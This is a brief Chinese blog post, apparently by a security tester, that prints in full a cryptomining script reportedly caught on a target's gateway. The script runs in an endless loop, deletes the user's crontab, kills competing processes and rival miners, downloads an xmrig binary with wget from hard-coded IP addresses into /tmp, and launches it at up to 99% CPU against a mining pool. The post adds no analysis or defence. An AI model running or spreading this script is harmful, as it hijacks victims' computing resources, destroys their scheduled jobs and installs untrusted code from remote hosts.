抓到的挖矿脚本

在日常目标的网关上抓到的挖矿脚本,自定义CPU使用率,贼爽啊。

while true;
do
    crontab -r;
    ps -eo user,pid,time,comm | grep $("whoami") | grep -v 'xmrig' | awk 'BEGIN{ FS=":|-"; OFS=""; } { print $1,$2,$3,$4,$5,$6 }' | awk '$3>500' | awk '{print $2}' | xargs -r kill -9
    ps x | grep 'networkservic[e]' | awk '{print $1}' | xargs -r kill -9
    ps x | grep 'sysupdat[e]' | awk '{print $1}' | xargs -r kill -9
    if [ ! -s "/tmp/xmrig_s" ]; then
        wget http://81.6.42.123/xmrig_s -O /tmp/xmrig_s; chmod +x /tmp/xmrig_s;
    fi
    if [ ! -s "/tmp/xmrig_s" ]; then
        wget http://82.72.134.224/xmrig_s -O /tmp/xmrig_s; chmod +x /tmp/xmrig_s;
    fi
    if [ "$(ps -eo comm | grep -c "xmri[g]")" -lt "2" ]; then
        /tmp/xmrig_s -r 1000 --donate-level 1 -o 119.23.222.239:26590 -B -p pass -k --max-cpu-usage=99 ;
    fi
    sleep 120;
done

Leave a Reply